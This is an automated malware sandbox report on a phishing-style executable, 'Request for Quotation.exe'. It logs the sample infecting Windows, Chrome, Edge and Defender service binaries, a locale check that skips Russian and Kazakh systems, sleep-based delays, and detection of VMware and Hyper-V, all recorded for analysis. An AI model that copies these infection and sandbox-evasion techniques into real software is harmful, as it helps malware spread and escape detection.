          Source: C:\Windows\System32\Spectrum.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\Spectrum.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\Spectrum.exeSection loaded: spectrumsyncclient.dllJump to behavior
          Source: C:\Windows\System32\Spectrum.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\Spectrum.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\Spectrum.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\Spectrum.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\Spectrum.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\Spectrum.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\Spectrum.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\Spectrum.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\Spectrum.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\Spectrum.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\Spectrum.exeSection loaded: perceptionsimulationextensions.dllJump to behavior
          Source: C:\Windows\System32\Spectrum.exeSection loaded: hid.dllJump to behavior
          Source: C:\Windows\System32\Spectrum.exeSection loaded: holographicruntimes.dllJump to behavior
          Source: C:\Windows\System32\Spectrum.exeSection loaded: perceptiondevice.dllJump to behavior
          Source: C:\Windows\System32\Spectrum.exeSection loaded: spatialstore.dllJump to behavior
          Source: C:\Windows\System32\Spectrum.exeSection loaded: esent.dllJump to behavior
          Source: C:\Windows\System32\Spectrum.exeSection loaded: analogcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\Spectrum.exeSection loaded: capabilityaccessmanagerclient.dllJump to behavior
          Source: C:\Windows\System32\Spectrum.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\Spectrum.exeSection loaded: windows.devices.enumeration.dllJump to behavior
          Source: C:\Windows\System32\Spectrum.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\Spectrum.exeSection loaded: structuredquery.dllJump to behavior
          Source: C:\Windows\System32\Spectrum.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\Spectrum.exeSection loaded: windows.globalization.dllJump to behavior
          Source: C:\Windows\System32\Spectrum.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\Spectrum.exeSection loaded: bcp47mrm.dllJump to behavior
          Source: C:\Windows\System32\Spectrum.exeSection loaded: icu.dllJump to behavior
          Source: C:\Windows\System32\Spectrum.exeSection loaded: mswb7.dllJump to behavior
          Source: C:\Windows\System32\Spectrum.exeSection loaded: devdispitemprovider.dllJump to behavior
          Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: libcrypto.dllJump to behavior
          Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\AppVClient.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{52BC3999-6E52-4E8A-87C4-0A2A0CC359B1}\InProcServer32Jump to behavior
          Source: Request for Quotation.exeStatic file information: File size 1795584 > 1048576
          Source: Request for Quotation.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: Request for Quotation.exe, 00000000.00000003.1706837407.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe.0.dr
          Source: Binary string: msiexec.pdb source: msiexec.exe.0.dr
          Source: Binary string: SensorDataService.pdb source: SensorDataService.exe.0.dr
          Source: Binary string: D:\a\_work\e\src\out\Release_x64\elevation_service.exe.pdb source: elevation_service.exe.0.dr
          Source: Binary string: AppVClient.pdbGCTL source: AppVClient.exe.0.dr
          Source: Binary string: SensorDataService.pdbGCTL source: SensorDataService.exe.0.dr
          Source: Binary string: PerfHost.pdb source: perfhost.exe.0.dr
          Source: Binary string: AppVClient.pdb source: AppVClient.exe.0.dr
          Source: Binary string: ssh-agent.pdb source: ssh-agent.exe.0.dr
          Source: Binary string: msiexec.pdbGCTL source: msiexec.exe.0.dr
          Source: Binary string: PresentationFontCache.pdb source: Request for Quotation.exe, 00000000.00000003.1747636578.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: maintenanceservice.pdb` source: maintenanceservice.exe.0.dr
          Source: Binary string: PerceptionSimulationService.pdb source: PerceptionSimulationService.exe.0.dr
          Source: Binary string: wntdll.pdbUGP source: svchost.exe, 00000013.00000003.1966749600.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2017801788.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.1963812454.0000000003100000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: svchost.exe, svchost.exe, 00000013.00000003.1966749600.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2017801788.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.1963812454.0000000003100000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: D:\a\_work\e\src\out\Release_x64\elevation_service.exe.pdbOGP source: elevation_service.exe.0.dr
          Source: Binary string: Spectrum.pdb source: Spectrum.exe.0.dr
          Source: Binary string: MsSense.pdbGCTL source: MsSense.exe.0.dr
          Source: Binary string: MsSense.pdb source: MsSense.exe.0.dr
          Source: Binary string: FXSSVC.pdb source: FXSSVC.exe.0.dr
          Source: Binary string: ALG.pdb source: Request for Quotation.exe, 00000000.00000003.1711267441.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
          Source: Binary string: Spectrum.pdbGCTL source: Spectrum.exe.0.dr
          Source: Binary string: locator.pdb source: Locator.exe.0.dr
          Source: Binary string: msdtcexe.pdb source: msdtc.exe.0.dr
          Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: Request for Quotation.exe, 00000000.00000003.1732378298.00000000040F0000.00000004.00001000.00020000.00000000.sdmp, DiagnosticsHub.StandardCollector.Service.exe.0.dr
          Source: Binary string: ALG.pdbGCTL source: Request for Quotation.exe, 00000000.00000003.1711267441.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
          Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: Request for Quotation.exe, 00000000.00000003.1747636578.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: Request for Quotation.exe, 00000000.00000003.1732378298.00000000040F0000.00000004.00001000.00020000.00000000.sdmp, DiagnosticsHub.StandardCollector.Service.exe.0.dr
          Source: Binary string: locator.pdbGCTL source: Locator.exe.0.dr
          Source: Binary string: FXSSVC.pdbGCTL source: FXSSVC.exe.0.dr
          Source: Binary string: ssh-agent.pdbX source: ssh-agent.exe.0.dr
          Source: Binary string: snmptrap.pdb source: snmptrap.exe.0.dr
          Source: Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\elevation_service.exe.pdb source: elevation_service.exe0.0.dr
          Source: Binary string: snmptrap.pdbGCTL source: snmptrap.exe.0.dr
          Source: Binary string: msdtcexe.pdbGCTL source: msdtc.exe.0.dr
          Source: Binary string: PerceptionSimulationService.pdbGCTL source: PerceptionSimulationService.exe.0.dr
          Source: Binary string: maintenanceservice.pdb source: maintenanceservice.exe.0.dr
          Source: Binary string: PerfHost.pdbGCTL source: perfhost.exe.0.dr
          Source: msiexec.exe.0.drStatic PE information: 0x88D88F1C [Thu Oct 2 20:16:28 2042 UTC]
          Source: elevation_service.exe.0.drStatic PE information: section name: .00cfg
          Source: elevation_service.exe.0.drStatic PE information: section name: .gxfg
          Source: elevation_service.exe.0.drStatic PE information: section name: .retplne
          Source: elevation_service.exe.0.drStatic PE information: section name: _RDATA
          Source: elevation_service.exe.0.drStatic PE information: section name: malloc_h
          Source: maintenanceservice.exe.0.drStatic PE information: section name: .00cfg
          Source: maintenanceservice.exe.0.drStatic PE information: section name: .voltbl
          Source: maintenanceservice.exe.0.drStatic PE information: section name: _RDATA
          Source: msdtc.exe.0.drStatic PE information: section name: .didat
          Source: msiexec.exe.0.drStatic PE information: section name: .didat
          Source: MsSense.exe.0.drStatic PE information: section name: .didat
          Source: armsvc.exe.0.drStatic PE information: section name: .didat
          Source: alg.exe.0.drStatic PE information: section name: .didat
          Source: FXSSVC.exe.0.drStatic PE information: section name: .didat
          Source: elevation_service.exe0.0.drStatic PE information: section name: .00cfg
          Source: elevation_service.exe0.0.drStatic PE information: section name: .gxfg
          Source: elevation_service.exe0.0.drStatic PE information: section name: .retplne
          Source: elevation_service.exe0.0.drStatic PE information: section name: _RDATA
          Source: elevation_service.exe0.0.drStatic PE information: section name: malloc_h
          Source: Spectrum.exe.0.drStatic PE information: section name: .didat
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00788550 push 0078852Eh; ret 14_2_00787F3A
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00788550 push 00788514h; ret 14_2_00787F66
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00788550 push 00787E66h; ret 14_2_00788057
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00788550 push 0078817Ah; ret 14_2_0078808B
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00788550 push 007882E5h; ret 14_2_007880D9
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00788550 push 0078826Ah; ret 14_2_0078819E
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00788550 push 0078849Ch; ret 14_2_007881E4
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00788550 push 0078805Ch; ret 14_2_00788255
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00788550 push 00788321h; ret 14_2_007882E0
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00788550 push 00787FBFh; ret 14_2_0078831F
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00788550 push 00787FA8h; ret 14_2_0078834C
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00788550 push 007884BAh; ret 14_2_007883E2
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00788550 push 00788426h; ret 14_2_007884D8
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00788550 push 00788075h; ret 14_2_007884FD
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00788550 push 0078808Ch; ret 14_2_00788512
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00788550 push 00788D45h; ret 14_2_007887D3
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00788550 push 00788AB5h; ret 14_2_00788B13
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00788550 push 00788784h; ret 14_2_00788CA1
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00788550 push 00788DC9h; ret 14_2_00788E1C
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00788550 push 00788D14h; ret 14_2_00788E2E
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00788550 push 00788674h; ret 14_2_00788E4D
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00788550 push 007888A6h; ret 14_2_00788F76
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00788550 push 0078868Ch; ret 14_2_00788FA4
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00787DF0 push 00787D4Bh; ret 14_2_00787D80
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00787DF0 push 00787DD7h; ret 14_2_00787D9F
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00787DF0 push 00787D5Fh; ret 14_2_00787DB3
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00787DF0 push 007881E6h; ret 14_2_00787E2D
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00787DF0 push 00787FCCh; ret 14_2_007882BB
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00787DF0 push 00788468h; ret 14_2_0078852D
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00766869 push 00766D46h; ret 14_2_0076687A
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_0076704C push 007672FAh; ret 14_2_00767057
          Source: Request for Quotation.exeStatic PE information: section name: .reloc entropy: 7.938033508315599
          Source: elevation_service.exe.0.drStatic PE information: section name: .reloc entropy: 7.95288261655599
          Source: AppVClient.exe.0.drStatic PE information: section name: .reloc entropy: 7.943022148528117
          Source: FXSSVC.exe.0.drStatic PE information: section name: .reloc entropy: 7.949290809660346
          Source: elevation_service.exe0.0.drStatic PE information: section name: .reloc entropy: 7.95078360050734
          Source: SensorDataService.exe.0.drStatic PE information: section name: .reloc entropy: 7.942006890028262
          Source: Spectrum.exe.0.drStatic PE information: section name: .reloc entropy: 7.9523341933571015

          Persistence and Installation Behavior

          barindex
          Creates files in the system32 config directory
          Source: C:\Windows\System32\AppVClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\398ce0ec3b45a4be.binJump to behavior
          Drops executable to a common third party application directory
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Infects executable files (exe, dll, sys, html)
          Source: C:\Users\user\Desktop\Request for Quotation.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSystem file written: C:\Windows\System32\snmptrap.exeJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSystem file written: C:\Windows\System32\Spectrum.exeJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSystem file written: C:\Windows\System32\Locator.exeJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSystem file written: C:\Windows\System32\FXSSVC.exeJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSystem file written: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSystem file written: C:\Windows\SysWOW64\perfhost.exeJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSystem file written: C:\Windows\System32\msiexec.exeJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSystem file written: C:\Windows\System32\SensorDataService.exeJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSystem file written: C:\Windows\System32\msdtc.exeJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSystem file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSystem file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to dropped file
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile created: C:\Windows\System32\snmptrap.exeJump to dropped file
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile created: C:\Windows\System32\Spectrum.exeJump to dropped file
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile created: C:\Windows\System32\Locator.exeJump to dropped file
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to dropped file
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile created: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to dropped file
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile created: C:\Windows\SysWOW64\perfhost.exeJump to dropped file
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile created: C:\Windows\System32\msiexec.exeJump to dropped file
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile created: C:\Windows\System32\SensorDataService.exeJump to dropped file
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile created: C:\Windows\System32\msdtc.exeJump to dropped file
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to dropped file
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile created: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to dropped file
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to dropped file
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile created: C:\Windows\System32\snmptrap.exeJump to dropped file
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile created: C:\Windows\System32\Spectrum.exeJump to dropped file
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile created: C:\Windows\System32\Locator.exeJump to dropped file
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile created: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to dropped file
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile created: C:\Windows\SysWOW64\perfhost.exeJump to dropped file
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile created: C:\Windows\System32\msiexec.exeJump to dropped file
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile created: C:\Windows\System32\SensorDataService.exeJump to dropped file
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile created: C:\Windows\System32\msdtc.exeJump to dropped file
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to dropped file
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_0078CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,14_2_0078CBD0
          Source: C:\Users\user\Desktop\Request for Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Contains functionality to behave differently if execute on a Russian/Kazak computer
          Source: C:\Windows\System32\AppVClient.exeCode function: 6_2_00C352A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 6_2_00C352A0
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 10_2_009952A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 10_2_009952A0
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 11_2_00CD52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 11_2_00CD52A0
          Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 13_2_005452A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 13_2_005452A0
          Source: C:\Windows\System32\Spectrum.exeCode function: 18_2_007752A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 18_2_007752A0
          Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCode function: 20_2_00D252A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 20_2_00D252A0
          Switches to a custom stack to bypass stack traces
          Source: C:\Users\user\Desktop\Request for Quotation.exeAPI/Special instruction interceptor: Address: ED4434
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035AD1C0 rdtsc 19_2_035AD1C0
          Source: C:\Windows\System32\msdtc.exeWindow / User API: threadDelayed 491Jump to behavior
          Source: C:\Windows\SysWOW64\perfhost.exeWindow / User API: threadDelayed 3989Jump to behavior
          Source: C:\Windows\SysWOW64\perfhost.exeWindow / User API: threadDelayed 6009Jump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeDropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
          Source: C:\Users\user\Desktop\Request for Quotation.exeDropped PE file which has not been started: C:\Windows\System32\msiexec.exeJump to dropped file
          Source: C:\Users\user\Desktop\Request for Quotation.exeDropped PE file which has not been started: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to dropped file
          Source: C:\Users\user\Desktop\Request for Quotation.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to dropped file
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_10-5753
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_11-5535
          Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_13-5663
          Source: C:\Windows\System32\Spectrum.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_18-5484
          Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_20-5621
          Source: C:\Windows\System32\AppVClient.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_6-5683
          Source: C:\Windows\SysWOW64\perfhost.exeAPI coverage: 3.8 %
          Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
          Source: C:\Users\user\Desktop\Request for Quotation.exe TID: 7016Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\System32\msdtc.exe TID: 6532Thread sleep count: 491 > 30Jump to behavior
          Source: C:\Windows\System32\msdtc.exe TID: 6532Thread sleep time: -49100s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\perfhost.exe TID: 7244Thread sleep count: 3989 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\perfhost.exe TID: 7244Thread sleep time: -39890000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\perfhost.exe TID: 7244Thread sleep count: 6009 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\perfhost.exe TID: 7244Thread sleep time: -60090000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exe TID: 7396Thread sleep time: -30000s >= -30000sJump to behavior
          Source: Request for Quotation.exe, 00000000.00000003.1747429848.0000000000EC1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1743658598.0000000000EC1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1743149995.0000000000EC1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1760305746.0000000000EC1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1757640309.0000000000EC1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1742733827.0000000000EC1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1744762476.0000000000EC1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1746541463.0000000000EC1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1745556871.0000000000EC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWAa
          Source: Spectrum.exe, 00000012.00000003.1795083876.0000000000641000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: Spectrum.exe, 00000012.00000002.2951679671.000000000061D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @oem2.infloc.vmwarebusdevicedescVMware VMCI Bus Devicer
          Source: Spectrum.exe, 00000012.00000003.1795083876.0000000000641000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .inVMware Virtual disk SCSI Disk Devicet System Management
          Source: Spectrum.exe, 00000012.00000003.1797695014.0000000000650000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
